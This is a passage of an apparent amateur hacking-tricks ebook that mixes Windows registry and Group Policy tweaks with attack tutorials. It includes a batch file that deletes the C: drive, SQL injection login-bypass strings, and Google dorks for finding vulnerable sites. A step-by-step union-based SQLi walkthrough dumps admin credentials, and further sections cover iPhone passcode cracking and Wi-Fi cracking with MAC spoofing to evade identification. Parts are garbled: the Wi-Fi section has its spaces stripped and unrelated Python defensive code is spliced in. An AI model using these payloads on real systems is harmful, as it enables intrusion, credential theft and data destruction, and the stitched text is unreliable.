After that click on Rate This computer. Note that your computer may take several minutes in rating the system.
You will see a screen similar to this.
MESSING UP WITH SCORES
To manipulate these scores head to the Windows installation drive (C: in our case). Then go to
Windows > Performance > WinSAT > DataStore
You will be able to see several indexing files there.
You will need to open the file ending with "Formal.Assessment (Initial).WinSAT"
Open the file in notepad. You will see the following window:
In the notepad window you don't need to go too far down to hunt for anything; simply change the values according to your will in the upper area. The values are written between tags. Such as
<MemoryScore>5.9</MemoryScore>
Change the values between tags and save the files. Next time you open the Windows Experience Index the values will be changed.
OFF THE ROAD TIP: For more fun we suggest everyone keep their scores realistic (not 7.9 exactly).
To revert the changes you can re-run the assessment.
THE HIDDEN DRIVES
HACK TO HIDE LOCAL DRIVES
In this article we are going to learn about hiding stuff. Generally, you hide the particular file which you want to keep personal. That is the most common way these days, and it can easily be exposed even by a middle school child.
But here we are going to learn how to hide whole specified drives (local disks), which keeps you safe from the children in your family. You can easily keep your data safe, whether it is your girlfriend's pic or blah… blah… blah…!
Let's learn how to hide the specified drives step by step:
To hide the drives you have to edit the group policies of your computer. To edit group policies, go to the "run" option, type "gpedit.msc" and click on OK. Or you can search in your search box for GROUP POLICY.
The group policy editor will open.
Then you will see, in the left part of the window, a "USER CONFIGURATION" option. Under the user configuration option there are three options:
1.) Software settings
2.) Windows settings
3.) Administrative templates
Give a single click on the administrative templates option. You will see that some options become available in the right part of the window. Open the "all settings" option.
When you open the "all settings" option, a long list of options is displayed. Click on the "settings" column to arrange them alphabetically. If they are already arranged, you can skip this step.
Now, pressing the "H" key of your keyboard a few times, search for the "hide these specified drives in my computer" option.
Double click on the "hide these specified drives in my computer" option. A window will open.
"ENABLE" it and choose the drives which you want to hide from the given options in the lower left part of the window. After applying the settings, click on OK and you will see the drives are hidden according to your choice. I have selected to hide only the A, B, C and D drives, so the E: drive will not be hidden in the screenshot given below.
In the above screenshot only the "E:" drive is shown to the user. If you want to access the drives which are hidden, click on the address bar of the My Computer window as marked in the above screenshot, type "D:" or "C:" and press the ENTER key of your keyboard to open the respective drive.
EMPTY HDD
FORMAT HARD DISK WITH NOTEPAD
In this article we are going to learn how to completely delete the C: drive of your computer without a formatting compact disk. Do it at your own risk, because it will destroy the Windows installation on your system, and for this I am not responsible.
FOLLOW THE BELOW STEPS TO FORMAT YOUR C: DRIVE:
Open Notepad and type the following given code
CODE:@echooffdelC:\*.*\y
Save it with the extension ".bat", such as "virus.bat".
Double click on the saved file to run this virus. The command prompt will open, where it will be deleting your drive.
Note: "I have not tried this virus yet, and also please don't try it on your personal computers. If you have ever tried it, please give me the reviews."
LET'S HAVE SOME FUN
FUNNY VIRUS TO SHOCK YOUR FRIENDS
Hello guys, I think after reading the above chapters it's now time to have some fun. In this article we are going to learn how to give a shock to your friend for a minute.
Basically, here we are going to create a funny virus which will not actually harm your friend's computer, but it will shock him/her for a minute.
So let's create that virus following the same steps we used to create some viruses in previous chapters. Follow the steps:
Open Notepad and type the following code:
CODES:
@echo off
msg * your computer is attacked by a virus.
msg * click ok to format.
msg * all your data has been deleted.
Save the document with the extension ".bat". For example, you can save the virus by the name "funnyvirus.bat".
Now your work is to execute the virus. Just double click on the virus and it will show you a message that
"your computer is attacked by a virus".
Now whether you click on "ok" or close the above message box, it will again show you a message, "click ok to format". And I am sure that you are not going to click on ok. But again, it does not matter if you click on ok or close the box, though I am sure that you will close the box. Again it will show you a message that "all your data has been deleted". And for a moment your friend's heartbeat is going to be at its peak.
So this is a funny way to shock your friends without actually harming them.
DO YOU HAVE i7?
HOW TO CHANGE YOUR PROCESSOR NAME
The trick we are going to learn here is the most interesting trick, and I am sure that it will increase your prestige among your friends, because these days it's a big deal among your group of friends whether you have an i3, i5 or i7 processor. So let's learn how to change your PC from any Core processor to i7.
For this you have to follow these steps:
First of all, go to the "run" option, write "regedit" and click on OK. It will open the registry editing window.
Open "HKEY_LOCAL_MACHINE" as highlighted in the figure.
Then open the "hardware" option present under it.
Then open the "Description" option and then open the "system" option. Also open the "central processor" option under the system option.
Then give a single click to the "0" folder present under "central processor". You will see that a lot of options appear in the right part of the regedit window. These are called STRINGS. Search for the "processor name string" among those strings.
Open the processor name string by double clicking on it. A dialogue box will open. In the "value data" text box is written what your computer's processor actually is.
I am using "Pentium(R) Dual-Core CPU T4500 @ 2.30GHz" as written in the value data. Now delete that text and write your own text in its place. For example, you can write "Intel(R) Core i7 CPU T9500 @ 2.30GHz" and click on the "ok" option.
Now close the registry editor and let's check whether it is working or not. To check it, look at the properties of your computer: right click on the My Computer icon and click on the "properties" option, which is the last option of the dialogue box.
The system properties of your computer are shown.
Yuppie! As you have seen, the processor name is as expected. Now your processor is turned into an i7.
And now you can say with pride that YOU HAVE A CORE i7 PROCESSOR.
HOW TO MAKE YOUR GOOGLE SEARCHES EFFECTIVE
In this article we are going to learn how to make our Google searches effective. If we have to find anything on Google, we open the Google website and start searching. For example, if you want to download a book, you write something like "fifty shades of grey for free". You will find a huge number of results on Google, like 753286543567 results in 0.43 seconds, which makes it difficult to find the exact working download link of that book.
You can take some very simple steps to reduce your Google search results. Let's assume we have to download the same book as mentioned above. If you write in the following way, it will reduce your Google results and make it simple to find the exact download link.
Write in this way in the Google search: you have to write your search under double quotes. Like: "fifty shades of grey.pdf"
Note: don't forget to apply the extension ".pdf"
Second method: using "GOOGLE HACKS"
You can also use an application named "Google hacks". It is easily available on the net and you can find the download by Google searches.
This application also helps you a lot in performing effective searches.
iOS PASSWORD CRACKING
IOS PASSWORD CRACKING
These days people generally use a 4-digit PIN to secure their phone. A mobile device gets lost or stolen and all the person recovering it has to do is try some basic number combinations such as 1234, 1212, or 0000, and soon the device will be unlocked.
Let's see how to crack your iOS password:
1. For the first step you have to put your iPhone or computer into device firmware upgrade mode, i.e. DFU mode:
To enter DFU mode, simply power the device off, hold down the Home button (bottom center) and sleep button (upper corner) at the same time for 10 seconds, and continue holding down the Home button for another 10 seconds. The mobile device screen goes blank.
2. After putting your phone into DFU mode you need to load the iOS Forensic Toolkit. For this you need to insert your USB license dongle into your computer and run Toolkit.cmd:
3. After that, the work to do is to load the iOS Forensic Toolkit Ramdisk onto the mobile device by selecting option 2 LOAD RAMDISK: Loading the RAMDISK code allows your computer to communicate with the mobile device and run the tools which are needed for cracking the password (among other things).
4. Now you need to select the iOS device type/model that is connected to your computer, as shown in Figure:
I don't have an iPhone 6 with me now, so I have selected option 14 because I have an iPhone 4 with GSM.
After that you see the toolkit connecting to the device, and it confirms a successful load, as shown in Figure:
You will also see the Elcomsoft logo in the middle of your mobile device's screen… I think it looks pretty:
6. Now if you want to crack the device's password/PIN, simply select option 6 GET PASSCODE on the main menu:
iOS Forensic Toolkit will prompt you to save the passcode to a file. To save the passcode, you can simply press Enter to accept the default of passcode.txt. The cracking process will commence and, with any luck, the passcode will be found and displayed as shown in Figure:
So, having no password for phones and tablets is bad, and a 4-digit PIN such as this is also not a much better choice. So be aware of the attacks! Get up, users, get up: it's time to be secured. You can also use iOS Forensic Toolkit to copy files and even crack the keychains to uncover the password that protects the device's backups in iTunes (option 5 GET KEYS).
PREVENTION: For protection against being hacked you can refer to the chapter "PASSWORD CREATING POLICIES".
HIDE YOUR RECYCLE BIN
HACK TO HIDE THE RECYCLE BIN
Sometimes when you modify the Windows GUI or install a theme for Windows, you find that the Recycle Bin icon remains unmodified and destroys the beauty of your modification.
So in this article we are going to learn how to delete the RECYCLE BIN by hacking the registry.
To delete the Recycle Bin you need to open the registry editor of your computer. I think after reading the above sections you are familiar with the "registry editor". So go through the registry editor and follow the given path.
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVe00AA002F954E}
When you finally open the last path, you will see that the default string of the Recycle Bin is defined. Now DELETE that string and restart your computer. You will find that the Recycle Bin is deleted. I am attaching a screenshot for your ease.
After finishing all the steps, don't forget to restart your computer. It will work only after the restart.
HOW BOTNET DDoS ATTACK WORKS…
DDoS Attack?
DDoS stands for "Distributed Denial of Service." A DDoS attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet. In contrast to a Denial of Service (DoS) attack, in which one computer and one Internet connection are used to flood the targeted resource with packets, a DDoS attack uses many computers and many Internet connections.
DDoS attacks are loosely divided into three different types.
The first, Application Layer DDoS Attacks, include Slowloris, zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities, and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in requests per second.
The second kind of DDoS attack, Protocol DDoS Attacks, includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This sort of attack consumes actual server resources, or those of intermediate equipment such as firewalls and load balancers, and is measured in packets per second.
The third kind of DDoS attack is usually considered the most dangerous. Volume-based DDoS Attacks include UDP floods, ICMP floods, and other spoofed-packet floods. The volume-based attack's goal is to saturate the bandwidth of the attacked site, and the magnitude is measured in bits per second.
Botnet?
Sometimes referred to as a "Bunch of Zombies," a botnet is a group of Internet-connected computers, each of which has been maliciously taken over, usually with the help of malware like Trojan horses. Usually without the knowledge of the computers' rightful owners, these machines are remotely controlled by an external source via standard network protocols, and are often used for malicious purposes, most commonly for DDoS attacks.
Botnet Tools
The originator of a botnet is often referred to as a "bot herder" or "botmaster." This individual controls the botnet remotely, usually through an IRC server or a channel on a public IRC server, referred to as the command and control (C&C) server. To communicate with the C&C server, the botmaster uses various hidden channels, including seemingly innocuous tools like Twitter or IM. More advanced bots automatically seek out more resources to exploit, joining more systems to the botnet in a process referred to as "scrumping." Botnet servers may continually communicate and cooperate with other botnet servers, making up entire communities of botnets, with individual or multiple botmasters. This means that any given botnet DDoS attack may well have multiple origins, or be controlled by multiple people, sometimes operating in coordination, sometimes operating singly.
Botnets are available for rent or lease from numerous sources, and the use of botnets is auctioned and traded among attackers. Actual marketplaces have sprung up: platforms that enable trading in large numbers of malware-infected PCs, which can be rented and used in botnet DDoS or other attacks. These platforms provide botnet DDoS attack perpetrators with a complete and richly featured toolkit, and a distribution network as well. Even for non-technical users, botnet DDoS attacking may be a viable and efficient choice to "take out" a competitor's website. Within the crime ecosystem, botnet DDoS attacks are a mainstream commodity, with prices dropping, and effectiveness and sophistication growing. Some of the most common tools for initiating a botnet DDoS attack are simply downloaded from multiple online sources, and include:
SlowLoris
Especially dangerous to hosts running Apache, dhttpd, Tomcat and GoAhead WebServer, Slowloris is a highly targeted attack, enabling one web server to take down another server without touching other services or ports on the target network.
Tor's Hammer
Is a slow POST DoS testing tool written in Python. It can also be run through the Tor network to be anonymized. There are several tools for testing server readiness to resist botnet DDoS attacks.
Qslowloris
Uses Qt libraries to execute the methods used by Slowloris, providing a graphical interface that makes the program highly simple to use.
Apache Killer
Utilizes an exploit within the Apache OS first discovered by a Google security engineer. Apache Killer pings a server and tells the server to break up whatever file is transferred into a huge number of little chunks, using the "range" variable. When the server tries to comply with this request, it runs out of memory, or encounters other errors, and crashes.
PyLoris
It is a scriptable tool for testing a service's level of vulnerability to a specific category of Denial of Service (DoS) attack.
DDoSim
Which can be employed in a laboratory environment to simulate a DDoS attack, and helps measure the capacity of a given server to handle application-specific DDoS attacks, by simulating multiple zombie hosts with random IP addresses that create TCP connections.
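One way a defender can screen for the multi-range requests that the Apache Killer description above relies on, as an added Python sketch (not code from the original text or from any of the tools listed). The limits MAX_RANGES and MAX_OVERLAPS, the function names and the sample headers are assumptions constructed for this example.

```python
import re

# Assumed policy limits for this sketch; tune them to what your clients really send.
MAX_RANGES = 5      # most legitimate clients ask for one or two ranges
MAX_OVERLAPS = 0    # overlapping ranges have no legitimate use in practice

_SPEC = re.compile(r"^(\d*)-(\d*)$")


def parse_range_header(value):
    """Parse 'bytes=a-b,c-,-n' into [(start, end), ...]; None marks an open side.

    Raises ValueError for anything that is not a well-formed bytes range.
    """
    unit, sep, specs = value.partition("=")
    if sep != "=" or unit.strip().lower() != "bytes":
        raise ValueError("not a bytes range header")
    ranges = []
    for spec in specs.split(","):
        match = _SPEC.match(spec.strip())
        if match is None or match.group(1) == match.group(2) == "":
            raise ValueError("malformed range spec: %r" % spec)
        start = int(match.group(1)) if match.group(1) else None
        end = int(match.group(2)) if match.group(2) else None
        if start is not None and end is not None and start > end:
            raise ValueError("range start after end: %r" % spec)
        ranges.append((start, end))
    return ranges


def count_overlaps(ranges):
    """Count ranges that begin inside the span already covered by earlier ones.

    Suffix ranges ('-500') depend on the file length and are skipped here.
    """
    spans = sorted((s, float("inf") if e is None else e)
                   for s, e in ranges if s is not None)
    overlaps, reach = 0, -1
    for start, end in spans:
        if start <= reach:
            overlaps += 1
        reach = max(reach, end)
    return overlaps


def assess_range_header(value):
    """Return ('allow' | 'flag', reasons) for one Range header value."""
    try:
        ranges = parse_range_header(value)
    except ValueError as exc:
        return "flag", [str(exc)]
    reasons = []
    if len(ranges) > MAX_RANGES:
        reasons.append("%d ranges exceeds limit of %d" % (len(ranges), MAX_RANGES))
    overlaps = count_overlaps(ranges)
    if overlaps > MAX_OVERLAPS:
        reasons.append("%d overlapping ranges" % overlaps)
    return ("flag" if reasons else "allow"), reasons


# Constructed sample values: three ordinary requests and one many-chunk request.
SAMPLE_HEADERS = [
    "bytes=0-499",
    "bytes=0-499,500-999",
    "bytes=-500",
    "bytes=0-," + ",".join("0-%d" % i for i in range(1, 300)),
]

if __name__ == "__main__":
    for header in SAMPLE_HEADERS:
        verdict, reasons = assess_range_header(header)
        print(verdict, header[:40], reasons)
```

A flagged request can be answered by ignoring the Range header and serving the whole resource, or by rejecting it at the proxy before it reaches the web server.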
Botnet DDoS Attacks
Botnet DDoS attacks are quickly becoming the most prevalent type of DDoS threat, growing rapidly within the past year in both number and volume, according to recent market research. The trend is towards shorter attack duration but larger packet-per-second attack volume, and the overall number of attacks reported has grown markedly as well. The average attack bandwidth observed throughout this period of 2010-2012 was 5.2 Gbps, which is 148% above the previous quarter. Another survey of DDoS attacks found that more than 40% of respondents experienced attacks that exceeded 1 Gbit per second in bandwidth in 2011, and 13% were targeted by at least one attack that exceeded 10 Gbit per second. From a motivational perspective, newer research found that ideologically driven DDoS attacks are on the increase, supplanting monetary motivation as the most frequent incentive for such attacks.
WEBSITE HACKING
WEBSITE HACKING
Now take your time, and be serious and free before starting this article, because this is a very wide and one of the most interesting articles among all of the above chapters. In this chapter we will discuss how to hack a vulnerable site using SQL injection.
What is SQL Injection?
SQL injection is one of the popular web application hacking methods. Using an SQL injection attack, an unauthorized person can access the database of the website. The attacker can extract the data from the database.
What can a hacker do with an SQL injection attack?
* Bypassing logins
* Accessing secret data
* Modifying contents of the website
* Shutting down the MySQL server
So, here we start with bypassing login, i.e. authentication bypass:
In this type of SQL injection, generally, once we have found the admin login page, we try to open the admin's control panel account by bypassing the authentication. If you have the admin login page of any website then you can paste the following codes (with quotes) to bypass the authentication of the website. Generally PHP websites are vulnerable to this injection:
You can find these types of sites simply by Google searches. You have to type like this in the Google search bar:
www.thesitename.com/adminlogin.php? Or /admin.php? Or Wp-login.php? Etc.
After finding the login page you have to paste the following codes in both the user ID and password fields of the admin page until it is bypassed. If not, we will try the next SQL injection, i.e. union based, blind based, error based etc.
Codes to be used as both user ID and password at the admin login page of a vulnerable website for bypassing authentication are as follows:
‘or’1’=’1‘or‘x’=‘x‘or0=0–”or0=0–or0=0–‘or0=0#”or0=0#or0=0#‘or‘x’=‘x”or“x”=”x‘)or(‘x’=‘x‘or1=1–”or1=1–or1=1–‘ora=a–”or“a”=”a‘)or(‘a’=‘a“)or(“a”=”ahi”or“a”=”ahi”or1=1–hi’or1=1–‘or’1=1’
If the authentication bypass does not work, then try the following techniques carefully and step by step:
UNION BASED SQLi:
Finding Vulnerable Website:
To find a SQL injection vulnerable site, you can use Google search by searching for certain keywords. Such a keyword is often called a "GOOGLE DORK".
Some Examples:
inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:pageid=
Now you have to copy one of the above keywords and Google it. Here we will get a lot of search results, and we have to visit the websites one by one to find the vulnerability.
For example: site:www.anyselectedsite.com inurl:index.php?id=
Step 1: Finding the Vulnerability:
Now let us check the vulnerability of the target website. To check the vulnerability, add a single quote (') at the end of the URL and press enter.
For eg:
http://www.anyselectedsite.com/index.php?id=2'
If the page remains the same or shows page not found, then it is not vulnerable. If you get an error message just like this, then it means that the site is vulnerable.
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Step 2: Finding Number of columns in the database:
Great, we have found that the website is vulnerable to SQLi attack. Our next step is to find the number of columns present in the target database. For that, replace the single quote (') with the "order by n" statement. Change n from 1, 2, 3, 4, 5, 6, … n until you get an error like "unknown column".
For eg:
http://www.anyselectedsite.com/index.php?id=2 order by 1
http://www.anyselectedsite.com/index.php?id=2 order by 2
http://www.anyselectedsite.com/index.php?id=2 order by 3
http://www.anyselectedsite.com/index.php?id=2 order by 4
If you get the error while trying the "n"th number, then the number of columns is "n-1". I mean:
http://www.anyselectedsite.com/index.php?id=2 order by 1 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 2 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 3 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 4 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 5 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 6 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 7 (no error shown)
http://www.anyselectedsite.com/index.php?id=2 order by 8 (error shown)
So now n=8, and the number of columns is n-1, i.e. 7.
In case the above method fails to work for you, then try to add "--" at the end of the statement. For eg:
http://www.anyselectedsite.com/index.php?id=2 order by 1--
Step 3: Find the Vulnerable columns:
We have successfully found the number of columns present in the target database. Let us find the vulnerable column by trying the query "union select columns_sequence".
Change the id value to negative (I mean id=-2). Replace columns_sequence with the numbers from 1 to n-1 (the number of columns) separated with commas (,).
For eg:
If the number of columns is 7, then the query is as follows:
http://www.anyselectedsite.com/index.php?id=-2 union select 1,2,3,4,5,6,7--
If you have applied the above method and it is not working, then try this:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,3,4,5,6,7--
Once you execute the query, it will display the vulnerable column.
Bingo, columns '3' and '7' are found to be vulnerable. Let us take the first vulnerable column, '3'. We can inject our query in this column.
Step 4: Finding version, database, user
Replace the 3 in the query with "version()"
For eg:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,version(),4,5,6,7--
Now it will display the version as 5.0.2 or 4.3, something like this. Replace version() with database() and user() to find the database and user respectively.
For eg:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,database(),4,5,6,7--
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,user(),4,5,6,7--
If the above is not working, then try this:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,unhex(hex(@@version)),4,5,6,7--
Step 5: Finding the Table Name
This step applies if the database version is 5 or above. If the version is 4.x, then you have to guess the table names (blind SQL injection attack). Let us find the table names of the database. Replace the 3 with "group_concat(table_name)" and add "from information_schema.tables where table_schema=database()"
For eg:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables where table_schema=database()--
Now it will display the list of table names. Find the table name which is related to the admin or user.
Let us choose the "admin" table.
Step 6: Finding the Column Name
Now replace "group_concat(table_name)" with "group_concat(column_name)"
Replace "from information_schema.tables where table_schema=database()--" with "FROM information_schema.columns WHERE table_name=mysqlchar--"
We have to convert the table name to a MySQL CHAR() string. Install the HackBar add-on from: https://addons.mozilla.org/en-US/firefox/addon/3899/
Once you have installed the add-on, you can see a toolbar that will look like the following one. If you are not able to see the HackBar, then press F9.
Select sql->Mysql->MysqlChar() in the HackBar.
It will ask you to enter the string that you want to convert to MySQL CHAR(). We want to convert the table name to MySQL CHAR. In our case the table name is 'admin'.
Now you can see the CHAR(numbers separated with commas) in the Hack toolbar.
Copy and paste the code at the end of the URL instead of "mysqlchar"
For eg:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(column_name),4,5,6,7 from information_schema.columns where table_name=CHAR(97,100,109,105,110)--
The above query will display the list of columns. For example:
admin,password,admin_id,admin_name,admin_password,active,id,admin_name,admin_pass,admin_id,admin_name,admin_password,ID_admin,admin_usernme,username,password..etc..
Now replace group_concat(column_name) with group_concat(columnname1,0x3a,anothercolumnname2).
Now replace "from information_schema.columns where table_name=CHAR(97,100,109,105,110)" with "from table_name"
For eg:
http://www.anyselectedsite.com/index.php?id=-2 and 1=2 union select 1,2,group_concat(admin_id,0x3a,admin_password),4,5,6,7 from admin--
If the above query displays the 'column is not found' error, then try another column name from the list.
If we are lucky, then it will display the data stored in the database depending on your column name. For example, the username and password columns will display the login credentials stored in the database.
Step 7: Finding the Admin Panel:
Just try with URLs like:
http://www.anyselectedsite.com/admin.php
http://www.anyselectedsite.com/admin/
http://www.anyselectedsite.com/admin.html
http://www.anyselectedsite.com:2082/
etc.
If you are lucky, you will find the admin page using the above URLs, or you can use some kind of admin finder tool like Havij admin finder, or sqlpoison for SQL attacking (tool).
And once you have found the admin panel, you have to do further work at your own risk.
PREVENTION:
This article is focused on providing clear, simple, actionable guidance for preventing SQL Injection flaws in your applications. SQL Injection attacks are unfortunately very common, and this is due to two factors:
1.) The significant prevalence of SQL Injection vulnerabilities, and
2.) The attractiveness of the target (i.e., the database typically contains all the interesting/critical data for your application).
It's somewhat shameful that there are so many successful SQL Injection attacks occurring, because it is EXTREMELY simple to avoid SQL Injection vulnerabilities in your code.
SQL Injection flaws are introduced when software developers create dynamic database queries that include user supplied input. To avoid SQL injection flaws is simple. Developers need to either: a) stop writing dynamic queries; and/or b) prevent user supplied input which contains malicious SQL from affecting the logic of the executed query.
This article provides a set of simple techniques for preventing SQL Injection vulnerabilities by avoiding these three problems. These techniques can be used with practically any kind of programming language with any type of database.
SQL injection flaws typically look like this:
The following (Java) example is UNSAFE, and would allow an attacker to inject code into the query that would be executed by the database. The unvalidated "customerName" parameter that is simply appended to the query allows an attacker to inject any SQL code they want. Unfortunately, this method for accessing databases is all too common.
// UNSAFE: request input is concatenated straight into the SQL text
String query = "SELECT account_balance FROM user_data WHERE user_name = " + request.getParameter("customerName");
try {
    Statement statement = connection.createStatement(…);
    ResultSet results = statement.executeQuery(query);
}
PREVENTIONS
Option 1: Prepared Statements (Parameterized Queries):
The use of prepared statements (parameterized queries) is how all developers should first be taught how to write database queries. They are simple to write, and easier to understand than dynamic queries. Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied. Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker. If an attacker were to enter the user ID ' or '1'='1, the parameterized query would not be vulnerable.
2. Use dynamic SQL only if absolutely necessary.
Dynamic SQL can almost always be replaced with prepared statements, parameterized queries, or stored procedures. For instance, instead of dynamic SQL, in Java you can use PreparedStatement() with bind variables, in .NET you can use parameterized queries, such as SqlCommand() or OleDbCommand() with bind variables, and in PHP you can use PDO with strongly typed parameterized queries (using bindParam()).
In addition to prepared statements, you can use stored procedures. Unlike prepared statements, stored procedures are kept in the database, but both require you first to define the SQL code, and then to pass parameters.
3:- Escaping All User Supplied Input
This third technique is to escape user input before putting it in a query. If you are concerned that rewriting your dynamic queries as prepared statements or stored procedures might break your application or adversely affect performance, then this might be the best approach for you. However, this methodology is frail compared to using parameterized queries and I cannot guarantee it will prevent all SQL Injection in all situations. This technique should only be used, with caution, to retrofit legacy code in a cost effective way. Applications built from scratch, or applications requiring low risk tolerance, should be built or re-written using parameterized queries.
This technique works like this. Each DBMS supports one or more character escaping schemes specific to certain kinds of queries. If you then escape all user supplied input using the proper escaping scheme for the database you are using, the DBMS will not confuse that input with SQL code written by the developer, thus avoiding any possible SQL injection vulnerabilities.
4. Install patches regularly and timely.
Even if your code doesn't have SQL vulnerabilities, when the database server, the operating system, or the development tools you use have vulnerabilities, this is also risky. This is why you should always install patches, especially SQL vulnerability patches, right after they become available.
5. Remove all functionality you don't use.
Database servers are complex beasts and they have much more functionality than you need. As far as security is concerned, more is not better. For instance, the xp_cmdshell extended stored procedure in MS SQL gives access to the shell, and this is just what a hacker dreams of. This is why you should disable this procedure and any other functionality which can easily be misused.
6. Use automated test tools for SQL injections.
Even if developers follow the rules above and do their best to avoid dynamic queries with unsafe user input, you still need to have a procedure to confirm this compliance. There are automated test tools to check for SQL injections and there is no excuse for not using them to check all the code of your database applications.
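The difference between the unsafe concatenated query and the parameterized query of Option 1, as an added Python example using the standard-library sqlite3 module (it is not code from the original book). The table and column names follow the Java snippet above; the sample rows, the function names and the sort-key allow-list are assumptions made for the illustration.

```python
import sqlite3

# Constructed sample rows; one name contains a quote on purpose.
SAMPLE_ROWS = [("alice", 120.50), ("bob", 75.00), ("o'brien", 42.00)]


def make_db():
    """Create an in-memory database holding the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user_data (user_name TEXT PRIMARY KEY, account_balance REAL)"
    )
    conn.executemany("INSERT INTO user_data VALUES (?, ?)", SAMPLE_ROWS)
    return conn


def balance_unsafe(conn, customer_name):
    """UNSAFE: builds the SQL text from input, like the Java example above."""
    query = (
        "SELECT account_balance FROM user_data WHERE user_name = '"
        + customer_name + "'"
    )
    return [row[0] for row in conn.execute(query)]


def balance_safe(conn, customer_name):
    """Parameterized: the SQL text is fixed and the value is bound as data."""
    query = "SELECT account_balance FROM user_data WHERE user_name = ?"
    return [row[0] for row in conn.execute(query, (customer_name,))]


# Column names cannot be bound as parameters, so the one piece of dynamic SQL
# that remains is chosen from a fixed allow-list, never taken from the request.
ALLOWED_SORT = {"name": "user_name", "balance": "account_balance"}


def list_users_sorted(conn, sort_key):
    """Return user names ordered by an allow-listed column."""
    column = ALLOWED_SORT.get(sort_key)
    if column is None:
        raise ValueError("unsupported sort key: %r" % sort_key)
    query = "SELECT user_name FROM user_data ORDER BY " + column
    return [row[0] for row in conn.execute(query)]


if __name__ == "__main__":
    conn = make_db()
    user_id = "' or '1'='1"  # the user ID quoted in Option 1
    # Concatenated: the WHERE clause becomes always-true, every balance leaks.
    print("unsafe:", balance_unsafe(conn, user_id))
    # Bound: the same text is compared as a literal name and matches nothing.
    print("safe:  ", balance_safe(conn, user_id))
    # A legitimate name with a quote works only with the bound query.
    print("safe:  ", balance_safe(conn, "o'brien"))
    try:
        balance_unsafe(conn, "o'brien")
    except sqlite3.OperationalError as exc:
        print("unsafe query breaks on a legitimate name:", exc)
    print("sorted:", list_users_sorted(conn, "balance"))
```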
SQL INJECT ME
TESTING SQL INJECTION BY USING TOOL
One of the easiest tools to test SQL injections is the Firefox extension named SQL Inject ME. After you install the extension, the tool is available in the right-click context menu, as well as from Tools → Options. The sidebar of SQL Inject ME is shown in the next screenshot and, as you can see, there are many tests you can run:
You can choose which tests to run and which values to test. When you press one of the Test buttons, the selected tests will start. When the tests are done, you will see a report of how the tests ended.
There are many options you can set for the SQL Inject ME extension, as shown in the next two pictures:
As you see, there are many steps you can take in order to clean your code of potential SQL injection vulnerabilities. Don't neglect these simple steps, because if you do, you will compromise the security not only of your sites but also of all the sites that are hosted with your web hosting provider.
WPA2TESTING
WI-FIHACKINGUSINGBACKTRACK
AfterperformingtheSQLinjection,Icanbetthatnowyouhavetheendlesscuriositytoexploremoreabouttheethicalhacking.AndasaccordingtoyourneednowinthisarticlewearegoingtoperformahardcorehackusingBacktrackLinux.wearegoingtolearnthathowtocracktheWI-FIusingBacktrack.onemorethingIwanttoaddherethatallthesestuffIamsharingwithyouisonlyforstudypurpose.ifyouhavetheblackintentionsjustleavethebooknow.Ifyouareperformingthisarticleonyourcomputer,youwillberesponsibleforanydamageoccurredbyyou.
Solet’sstartthearticle:
NowletusstartwiththeWi-Ficracking.ButbeforestartingthetutorialletmegiveyouasmallintroductiontowhatWi-Fihackingisandwhatisthesecurityprotocolsassociatedwithit.
Inasecuredwirelessconnectedthedataoninternetissentviaencryptedpackets.Thesepacketsaresecuredwithnetworkkeys.Therearebasically2typesofsecuritykeys:
WEP(WirelessEncryptionProtocol):-Thisisthemostbasicformofencryption.Thishasbecomeanunsafeoptionasitisvulnerableandcanbecrackedwithrelativeease.Althoughthisisthecasemanypeoplestillusethisencryption.WPA(WI-FIProtectedAccess):Thisisthemostsecurewirelessencryption.Crackingofsuchnetworkrequiresuseofawordlistwithcommonpasswords.Thisissortofbruteforceattack.Thisisvirtuallyuncrackableifthenetworkissecuredwithastrongpassword
Solet’sbegintheactualWi-FiHackingtutorial!InordertocrackWi-Fipassword,yourequirethefollowingthings:
FortheWi-FihackingyouneedtoinstalltheBacktrackonyourcomputer.
IamassumingthatyouhavealreadyinstalledtheBacktrackonyourpc.Ifnotit’sveryeasytoinstallbymakingbootableliveCD/DVD.ForinstallingprocessesyoucanjustGoogleit.Youwillgetiteasily.
Nowopentheconsolefromthetaskbar,Clickontheiconagainstthedragonlikeiconinthetaskbarintheabovescreenshot.YouwillhaveaCommandPromptlikeShellcalledasconsoleterminal.
1)Let’sstartbyputtingourwirelessadapterinmonitormode.Itallowsustoseeallofthewirelesstrafficthatpassesbyusintheair.Typeairmon-ngintheconsoleterminalandpressEnter.Youwillhaveascreenlikethis,notedownthenameofinterface,inthiscasethenameiswlan0.
2)Nowtypeifconfigwlan0downandhitenter.
Thiscommandwilldisableyourwirelessadapter;wearedoingthisinordertochangeyourMACaddress.
Now,youneedtohideyouridentitysothatyouwillnotbeidentifiedbythevictim.todothisyouneedtotypeifconfigwlan0hwether00:11:22:33:44:55andhitenter.
